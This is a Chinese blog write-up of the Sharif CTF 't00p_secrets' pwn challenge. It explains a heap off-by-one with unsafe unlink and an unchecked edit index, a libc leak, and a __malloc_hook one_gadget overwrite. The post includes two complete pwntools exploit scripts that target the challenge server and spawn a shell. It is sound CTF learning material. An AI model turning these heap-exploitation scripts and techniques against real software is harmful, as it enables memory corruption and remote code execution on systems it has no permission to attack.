sharif ctf pwn t00p_secrets writeup

最新推荐文章于 2022-04-04 21:23:02 发布
最新推荐文章于 2022-04-04 21:23:02 发布
阅读量469 收藏 1
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/79296696
版权

这题在比赛的时候没做出来,现在回顾一下,发现其实漏洞挺多的,而且还挺好用的…..(打比赛的时候真的是当局者迷,旁观者清….

漏洞:

主要的漏洞有两个,两个漏洞都可以分别达到任意内存写,任意内存读的效果

1. 堆off-by-one

当选择字符串的类型的时候,会将读取的字符串后的那个字节置为0,当读取的字符完全占满malloc申请的内存之后,会将下一个堆的size的一个字节置为0

然后我们可以申请两个大小为0xf8的堆,这个时候两个堆的size都是0x100
然后edit第一个堆,或者delete后再申请,可以将第二个堆的size从0x101变为0x100
这个时候就可以伪造一个堆,然后利用unsafe_unlink将bss段那里指向当前堆的那个地址修改为自身地址-0x24,这个时候就可以为所欲为,任意读和任意写都可以实现

2. edit_secret下标没检查范围

这里其实在打比赛的时候已经注意到了,但是当时怎么也没想到怎么用,然后看了下别人的wp,发现有个地方是会赋值的….虽然每次都只赋2byte
这里写图片描述
这里只要把ptr存的堆地址改成bss地址的话,就跟上面没什么差别了

如何得到libc

讲了漏洞,接下来讲一下如何得到libc,也是有好几种办法

  1. 利用堆free 崩溃信息来得到libc版本
    在上面off-by-one 那里,new两个比较小的堆,然后利用off-by-one将第二个堆的size修改为0 , 在free的话,这个时候会崩溃,在memory信息那里会显示具体的版本号是什么

  2. 利用上面两个漏洞的任意读,结合dynelf来得到基址和两个库函数地址,到https://libc.blukat.me上面搜一下就可以了

如何利用漏洞

得到libc之后
因为这题开了Full RELRO,所以不能用常规的修改got表之类的办法

所以可以用__malloc__hook或者__free__hook 这些地方,写入one_gadget 来一发get shell

payload:
off-by-one: 

from pwn import *

key='wjigaep;r[jg]ahrg[es9hrg'

debug=0
if debug:
    p=process('./t00p_secrets')
    context.log_level='debug'
    e=ELF('/lib/x86_64-linux-gnu/libc-2.24.so')
    one_g=0x3f32a
    #gdb.attach(proc.pidof(p)[0])
else:
    p=remote('ctf.sharif.edu',22107)
    e=ELF('./libc6.so')
    one_g=0x4526a
    context.log_level='debug'

def ru(x):
    p.recvuntil(x)

def se(x):
    p.sendline(x)

def create_secret(idx,size,ty,body):
    se('1')
    ru('Enter secret idx: ')
    se(str(idx))
    ru('Enter secret body size')
    se(str(size))
    ru('binary(0) or String(1):')
    se(str(ty))
    ru('Please enter secret body ')
    p.send(body)
    ru('Exit')

def delete_secret(idx):
    se('2')
    ru('Please enter secret id to delete: ')
    se(str(idx))
    ru('Exit')

def edit_secret(idx,ty,body):
    se('3')
    ru('Please enter secret id to edit:')
    se(str(idx))
    ru('binary(0) or String(1):')
    se(str(ty))
    ru('Please enter secret content: ')
    se(body)
    ru('Exit')

def print_secret():
    se('4')
    ru('Exit')

def print_a_secret(idx):
    se('5')
    ru('Please enter secret id to print:')
    se(str(idx))
    p.recvuntil('content: ')
    data=p.recvuntil('1. ')[:-3]
    return data



ru('Enter your master key:')
se(key)
create_secret(1,0xf8,1,'a'*0x18)
create_secret(2,0xf8,0,'a'*0x17)
delete_secret(1)
fake_heap=p64(0xdeadbeef)+p64(0xf1)+p64(0x6020c8-0x8*4)+p64(0x6020c8-0x8*3)
fake_heap= fake_heap.ljust(0xf0,'a')
fake_heap+= p64(0xf0)

create_secret(1,0xf8,1,fake_heap)
create_secret(3,0xf8,0,'a'*0x20)
delete_secret(2)  #unsafe_unlink

payload='a'*16+p64(0)+p64(0x6020c0)+p64(0)+p64(0x601F78)
edit_secret(1,0,payload)

data=print_a_secret(3)
free=u64(data[:8])
base=free-e.symbols['__libc_free']



print('base:',hex(base))
print('free',hex(free))

malloc_hook=base+e.symbols['__malloc_hook']

pay=p64(0x6020c0)+p64(0)+p64(malloc_hook)

edit_secret(1,0,pay)

one_gadget=one_g+base

edit_secret(3,0,p64(one_gadget))

p.sendline('1')
sleep(0.1)
p.sendline('0')
sleep(0.1)
p.sendline('40')

print(hex(malloc_hook))

p.interactive()

下标溢出:

from pwn import *

key='wjigaep;r[jg]ahrg[es9hrg'

debug=1
if debug:
    p=process('./t00p_secrets')
    context.log_level='debug'
    e=ELF('/lib/x86_64-linux-gnu/libc-2.24.so')
    one_g=0x3f32a
    gdb.attach(proc.pidof(p)[0])
else:
    p=remote('ctf.sharif.edu',22107)
    e=ELF('./libc6.so')
    one_g=0x4526a
    context.log_level='debug'

def ru(x):
    p.recvuntil(x)

def se(x):
    p.sendline(x)

def create_secret(idx,size,ty,body):
    se('1')
    ru('Enter secret idx: ')
    se(str(idx))
    ru('Enter secret body size')
    se(str(size))
    ru('binary(0) or String(1):')
    se(str(ty))
    ru('Please enter secret body ')
    p.send(body)
    ru('Exit')

def delete_secret(idx):
    se('2')
    ru('Please enter secret id to delete: ')
    se(str(idx))
    ru('Exit')

def edit_secret(idx,ty,body):
    se('3')
    ru('Please enter secret id to edit:')
    se(str(idx))
    ru('binary(0) or String(1):')
    se(str(ty))
    ru('Please enter secret content: ')
    p.send(body)
    ru('Exit')

def print_secret():
    se('4')
    ru('Exit')

def print_a_secret(idx):
    se('5')
    ru('Please enter secret id to print:')
    se(str(idx))
    p.recvuntil('content: ')
    data=p.recvuntil('1. ')[:-3]
    return data



ru('Enter your master key:')
se(key)
create_secret(0,0xf8,1,'a'*0x18)
create_secret(1,0xf8,1,'a'*0x18)
data=p32(0x6020b8)
for i in range(2):
    se('3')
    ru('Please enter secret id to edit:')
    se(str(28+0x18+i))
    ru('binary(0) or String(1):')
    p.sendline(str(int(data[i*2:i*2+2][::-1].encode('hex'),16)))
    ru('Exit')

edit_secret(0,0,p64(0x6020b8)+p64(0x601F78))
data=print_a_secret(1)

free=u64(data[:6]+'\x00\x00')
base=free-e.symbols['__libc_free']

malloc_hook=base+e.symbols['__malloc_hook']

one_gadget=one_g+base

edit_secret(0,0,p64(0x6020b8)+p64(malloc_hook))
edit_secret(1,0,p64(one_gadget))

se('1')
sleep(0.1)
se('3')
sleep(0.1)
se('100')

p.interactive()
charlie_heng
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DSP_Md Sharif_3E_library_dusttrz_
10-04
标题中的“DSP_Md Sharif_3E_library_dusttrz_”可能指的是一个与数字信号处理相关的项目或教程,由Md Sharif编写的第三版。"DSP"是Digital Signal Processing(数字信号处理)的缩写,这通常涉及到对数字信号进行...
pwn学习】堆溢出(四)- off-by-one 漏洞
Morphy_Amo的博客
02-16 1061
off-by-one 漏洞 前置学习 【pwn学习】堆溢出(一) 【pwn学习】堆溢出(二)- First Fit 【pwn学习】堆溢出(三)- Unlink和UAF off-by-one是一种特殊的溢出漏洞,指只溢出一个字节的情况。 造成原因 造成off-by-one的原因常常是因为边界验证不充分。 循环写入时,循环次数设置错误导致多写入了一个字节; 字符串操作有误; strlen 是我们很熟悉的计算 ascii 字符串长度的函数,这个函数在计算字符串长度时是不把结束符 '\x00' 计算
pwn-堆溢出off-by-one
CharlesGodX的博客
04-17 1809
Thunder_J@Thunder_J-virtual-machine:~/桌面$ python exp.py [+] Starting local process './Storm_note': pid 16030 [*] '/home/Thunder_J/\xe6\xa1\x8c\xe9\x9d\xa2/Storm_note' Arch: amd64-64-little ...
攻防世界WP-reverse-SharifCTF 2016-getit
wallacegen的博客
04-14 438
这个题目也属于新手入门区,但是卡在一个地方不懂,就是伪代码中的几个参数,后来去看别人的WP,才知道。如下所示: int __cdecl main(int argc, const char **argv, const char **envp) { char v3; // al __int64 v5; // [rsp+0h] [rbp-40h] int i; // [rsp+4h] [rb...
2016 Sharif CTF unterscheide
ACdream
05-18 390
知识点:费马小定理当p为素数时,a^(p-1)≡1(mod p)题目分析:#!/usr/bin/python import gmpy import random, os from Crypto.Util.number import * from Crypto.Cipher import AES from secret import flag, q, p1, p2, h assert (...
攻防世界PWN之secret_holder题解
seaaseesa的博客
02-07 1010
secret_holder 本题,附件在https://pwn-1253291247.cos.ap-chengdu.myqcloud.com/SecretHolder,刷题网站上没有提供 拿到附件,我们先检查一下程序的保护机制 然后,我们用IDA分析一下 Free后没有清空指针,可以造成多次重复free 可以多次创建堆,只要我们free后再创建即可 那么,本题,我们可以利用...
sharif_course_list:SUT的课程列表的摘要
05-10
该存储库是Sharif科技大学提供的课程的 ,始于2020年秋季学期(贾拉利1399年)。 数据包括每个系的可用课程,以及有关这些课程的详细信息(课程的最大容量,教授,前提条件,注册学生的数量,...)。 提供刮取并...
Neuroscience_Sharif_HW:学习,记忆认知的神经科学
03-06
【标题】"Neuroscience_Sharif_HW" 涉及的主题是学习、记忆与认知的神经科学,这是一门研究人类和动物大脑如何获取、处理、存储和使用信息的学科。在这个项目中,可能涵盖了大脑如何通过神经元网络进行信息编码、...
Signals-Systems_Sharif_HW:Matlab家庭作业,信号与系统_Sharif
03-22
本压缩包文件“Signals-Systems_Sharif_HW”包含了Sharif大学的信号系统课程的家庭作业,为学生提供了在MATLAB环境中实践信号处理理论的机会。 在这个MATLAB家庭作业中,学生可能会遇到以下关键知识点: 1. **信号...
JonaidSharif_Portfolio_Website:乔纳德·谢里夫(Jonaid Sharif
04-25
乔纳德·谢里夫(Jonaid Sharif)的个人作品网站是一个展示其技能和项目的平台,这通常是一个程序员或设计师向潜在雇主或客户展示自己能力的重要途径。这个项目标签为"personal-site"、"portfolio"、"personal"、...
攻防世界pwn题 -- secret file 题解
lifanxin的博客
12-24 866
Write Up知识点关键字样本运行静态分析程序逻辑求解脚本 知识点关键字 栈溢出,popen函数,openssl sha256函数 样本 样本来自攻防世界的pwn题 – secret file 运行 查看文件属性   所有保护全开 运行样本程序   本地运行会报一个错误即缺少一个libc动态链接库   该库是openssl开源库,用来实现一些加密算法的,这里给出libcrypto.so.1.1,报错的可以添加到自己本地,使用如下代码在本地/usr/lib下创建一个软链接就行。 ln -s libcrypt
攻防世界 pwn 进阶 secret_holder
yongbaoii的博客
02-18 331
进去给了个网站让我自己下载附件,找半天没找到,最终还是嫖了个现成的。 https://pwn-1253291247.cos.ap-chengdu.myqcloud.com/SecretHolder 看一手保护,PIE没有开,还好,RELRO也没有全开,第一想法可以考虑劫持一手GOT表。 又是菜单题,主程序简单,且有循环。 程序很简单,三个秘密,然后地址跟flag都在bss段上,分别占了八个跟四个字节。 同时calloc函数跟malloc函数一样,申请空间,区别是calloc函数会把申请到得空间都清零。
[2021祥云杯]secrets_of_admin writeup + TypeScript看看
ShenZ的博客
04-04 2381
[2021祥云杯]secrets_of_admin writeup + TypeScript看看思路: > `admin`路由中:content传入一个src属性的标签触发SSRF并访问`api/files`路由,利用`/api/files`在files表中为admin用户创建一个flag文件,然后通过`/api/files/:id`路由来读取该文件。 相关漏洞: >1.src属性的标签在html中可以自动触发,或者说是HTML转PDF时,HTML里面的图片资源被自动加载进来 >2.includes()方
2019年CTF4月比赛记录(一):ENCRYPT CTF 部分Web题目writeup与重解
極品━═☆宏的博客
04-05 3299
简简单单做些题,踏踏实实做些事 时间:2019年4月2日至4月4日 一、VolgaCTF—Shop(重解): 打开以后,是个购买题,又是需要花钱买flag的 ๐·°(৹˃̵﹏˂̵৹)°·๐ 按照惯例,肯定是有文章的,随便试一下几个后缀,试出来了: 直接下载就可以了,下载后打开是个文件夹,里面还有三个子文件夹,我愣是没看懂这是干啥的。后来看了一下别人写的wp,还是有点有用的东西的,又一次感觉到...
实验吧密码学WriteUp(一)
Yale的博客
03-19 9403
这个系列的文章会将简单的题目放在一起介绍,稍难的题目会单独拿出来写,现在开始。 1.js(题目连接:http://www.shiyanbar.com/ctf/1779) 打开网页查看源码,复制源码至Chrome的console,将代码中的eval改为console.log,回车后显示 一看就知道是unicode编码,找网站在线解码即可 2.NSCTF crypto200(连接:http:
Unlink学习笔记(off-by-one null byte漏洞利用)
TaiJi1985的专栏
08-27 2640
看了很多malloc unlink 的案例,仍然是云里雾里, 找了一个案例,反复调了几十遍才弄明白其中原理。 off-by-one 漏洞 以及漏洞利用原理 off-by-one漏洞就是malloc 本来分配了0xf8的内存,结果可以写0xf9字节的数据,多写了一个,影响了下一个内存块的头部信息, 进而造成了被利用的可能。 unlink是双链表中删除一个节点的操作。 当前是p 前一个...
33c3 CTF web WriteUp
Bendawang's Blog
01-05 3096
33c3 CTF web WriteUp
TJCTF之Secure Secrets
NoOneGroup
09-11 342
博客已经转移 https://noone-hub.github.io/ 百度你查的到的writeup都是说很简单,然后给代码,对于我等新手很不友好,谷歌搜索可以搜索到详细的writeup,也是解释的一半一半,对于新手也不是很友好,看了个youtube的视频,发觉讲的不错,代码简洁,最后懂了,不过就是全英文的,有点难听懂 回到正题:这道题可以用ida打开,审查代码发觉有格式化字符串漏洞,或者自...
CTF-安恒19年二月月赛部分writeup
weixin_33968104的博客
02-26 1643
CTF-安恒19年二月月赛部分writeup MISC1-来玩个游戏吧 题目: 第一关,一眼可以看出是盲文,之前做过类似题目 拿到在线网站解一下 ??41402abc4b2a76b9719d911017c592,那么就奇怪了,这个??是什么东西,数一下加上??正好32位,应该是个MD5了,索性直接百度一下, 第一关答案出来了,试过了MD5值不对,hell...
基于使用蒙特卡罗方法来生成的水下可见光通信信道来完成使用LMS均衡技术的水下光通信matlab仿真代码,信道长度1米,结果用均衡后的和无均衡的在同一张图里做对比,要明显的突出均衡后的误码率要低于无均衡的,均衡后的3dB带宽要高于无均衡的
最新发布
05-05
抱歉,我作为一个语言模型AI无法提供您所需的matlab代码。但我可以给您提供一些思路和参考文献来帮助您完成任务。 1. 使用蒙特卡罗方法生成水下可见光通信信道 您可以使用光线追踪(ray tracing)方法来生成水下可见光通信信道。可以参考以下文献: - J. M. Kahn and J. R. Barry, "Wireless Infrared Communications," Proceedings of the IEEE, vol. 85, no. 2, pp. 265-298, Feb. 1997. - B. S. Sharif and M. S. Rahman, "Underwater Wireless Communication Using Optical Waves," Journal of the Optical Society of America A, vol. 24, no. 6, pp. 1702-1711, June 2007. 2. 使用LMS均衡技术进行水下光通信的均衡 您可以使用最小均方(LMS)算法对接收信号进行均衡。可以参考以下文献: - S. S. Das and S. K. Das, "Adaptive Equalization for Underwater Optical Wireless Communication," IEEE Journal of Oceanic Engineering, vol. 42, no. 3, pp. 604-611, July 2017. - M. A. Al-Qutayri and S. A. Aljunid, "Performance Analysis of Adaptive Equalization Techniques for Underwater Optical Communication Systems," Optik, vol. 124, no. 19, pp. 4314-4319, Oct. 2013. 3. 仿真实现 您可以使用MATLAB软件进行仿真实现。可以参考以下文献: - M. S. Rahman and B. S. Sharif, "Performance Analysis of Underwater Wireless Optical Communication Systems with Diversity Receivers," Optik, vol. 130, pp. 1121-1126, June 2017. - H. T. Chiang, L. S. Chen, and Y. C. Lin, "Performance Analysis of Nonlinear Effects in Underwater Wireless Optical Communications Systems with Digital Modulation," Optics Communications, vol. 284, no. 8, pp. 1785-1793, Apr. 2011. 希望这些信息可以帮助到您。祝您成功完成任务!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值